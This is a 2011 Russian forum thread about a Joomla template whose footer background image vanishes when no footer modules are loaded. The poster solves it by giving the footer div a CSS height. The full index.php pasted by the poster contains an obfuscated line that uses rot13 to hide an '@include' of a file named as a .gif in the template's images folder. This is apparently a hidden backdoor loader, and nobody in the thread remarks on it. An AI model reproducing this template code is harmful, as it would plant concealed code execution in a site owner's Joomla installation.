0 / 0 / 0
Регистрация: 25.07.2011
Сообщений: 18
1

Нужна помощь в коде шаблона!!!

25.07.2011, 05:23. Показов 1183. Ответов 2
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
В общем есть код в index.php вот он:

HTML5
1
2
3
4
5
6
7
8
9
10
11
<div id="f_area">
<?php if($this->countModules('user1')) : ?>
<jdoc:include type="modules" name="user1" style="xhtml" />
<?php endif;?>
 
<?php if($this->countModules('user2')) : ?>
<jdoc:include type="modules" name="user2" style="xhtml" />
<?php endif; ?>
<br clear="all" />
 
</div>
И есть ещё вот прописаный в css файле:

CSS
1
2
3
4
5
6
7
8
9
10
11
12
13
div#f_area{
 
background: url(../images/bg_foot.jpg) top center no-repeat; 
 
margin:0px auto;
 
width: 980px;
 
text-align:left;
 
margin-bottom:0px;
 
}
Это код, который выводит отображение в Joomla модулей в футере... Но когда модулей нет, то картинка (бекграунд) не отображается.... В общем вопрос очень простой как сделать так что бы она отображалась когда модулей нет??? Это очень срочно)) буду благодарен за решение)

на Всякий случай вот полный код файла индекс
HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<body id="page_bg" >
<a name="up" id="up"></a>
<center><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/top.png" alt="" /></center>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?> 
<?php include('functions.php'); ?>
<div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?></div></div>
 
<div id="main_bg">
    <div id="h_area"><?php if($this->params->get('hideLogo') == 0) : ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo<?php echo $this->params->get('logoVariation'); ?>.gif" alt="" align="left" /><?php endif; ?><a href="index.php" class="logo" title=""><?php echo $mainframe->getCfg('sitename') ;?></a>
    <?php if($this->countModules('user4')) : ?><div id="user4"><jdoc:include type="modules" name="user4" /></div><?php endif; ?>
    <br clear="all" />
    <?php if($this->params->get('hideBannerArea') == 0) : ?>
        <?php if((JRequest::getVar('view') != 'frontpage' and $this->params->get('hideBannerAreaInternal') == 0) or JRequest::getVar('view') == 'frontpage') : ?>
            <div id="main_top" class="banner"><jdoc:include type="modules" name="top" /></div>
        <?php endif; ?> 
    <?php endif; ?> 
    </div>
    <?php if($this->countModules('left')) : ?>
    <div id="leftcolumn">
        <jdoc:include type="modules" name="left" style="rounded" />
    </div>
    <?php endif; ?>
    <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
          elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
          else $maincol_sufix = ''; ?>
    <div id="maincolumn<?php echo $maincol_sufix; ?>">
        <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div><jdoc:include type="message" />
        <div class="nopad"><jdoc:include type="component" /></div>
    </div>
    <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
    <div id="rightcolumn">
        <jdoc:include type="modules" name="right" style="xhtml"/>
        <script type="text/javascript" src="http://userapi.com/js/api/openapi.js?34"></script>
        <br />
        <div align="center"><jdoc:include type="modules" name="syndicate" /></div>
    </div>
    <?php endif; ?>
    <br clear="all" />
</div>    
 
<div id="f_area">
    <?php if($this->countModules('user1')) : ?>
        <jdoc:include type="modules" name="user1" style="xhtml" />
    <?php endif;?>
    
    <?php if($this->countModules('user2')) : ?>
        <jdoc:include type="modules" name="user2" style="xhtml" />
    <?php endif; ?>
    <br clear="all" />
    
</div>
<p id="power_by" align="center"><center><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/bottom.png" alt="" /></center>
</p>
</body>
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
25.07.2011, 05:23
Ответы с готовыми решениями:

Установка шаблона joomla1.7. Нужна помощь.
Добрый день. Помогите новечку разобраться с joomla 1.7. Пытаюсь установить шаблон...

Ошибки в коде при установке шаблона
Доброго времени суток! Помогите разобраться с проблемой: 3 шаблона для джмулы установил...

Нужна помощь по Framework`ам для Joomla
Господа. Изучал джумлу, шаблоны под нее делал, переделывал, но недавно наткнулся на шаблоны...

Нужна помощь! Прикрепление pdf файла в разделе на сайт
Профессионалы, помогите дилетанту! 1. Как загрузить pdf-фаил после текста новости в разделе,...

2
633 / 376 / 7
Регистрация: 25.05.2010
Сообщений: 1,372
25.07.2011, 09:00 2
Можно попробовать убрать if-ы, отображающие позиции user1 и user2 только в случае наличия в них модулей. Но в таком случае, иметь ввиду, что пр наличии модуля лишь в одной из позиций он будет занимать половину ширины.
HTML5
1
2
3
4
5
<div id="f_area">
<jdoc:include type="modules" name="user1" style="xhtml" />
<jdoc:include type="modules" name="user2" style="xhtml" />
<br clear="all" />
</div>
0
0 / 0 / 0
Регистрация: 25.07.2011
Сообщений: 18
25.07.2011, 22:08  [ТС] 3
Тему можно закрывать. Решением проблемы было просто в файле css прописать height к f_area...
0
25.07.2011, 22:08
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
25.07.2011, 22:08
Помогаю со студенческими работами здесь

ошибка в коде (нужна помощь)
вот сам код: #include &lt;iostream.h&gt; void show__parameters (int a=1, int b=2, int c=3) { ...

Нужна помощь с исправлением ошибок в коде
Добрый день! Нужна помощь с исправлением ошибок в коде. unit Unit1; interface uses ...

Помощь в создании шаблона
Доброго времени суток. Я сам от программирования далек, потому нужна помощь специалистов. Нужно...

СРОЧНО НУЖНА ПОМОЩЬ! Нужна информация о тест оборудовании
Доброго времени суток! Интересует информация (книги, статьи, научные статьи, сайты, зарубежная...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru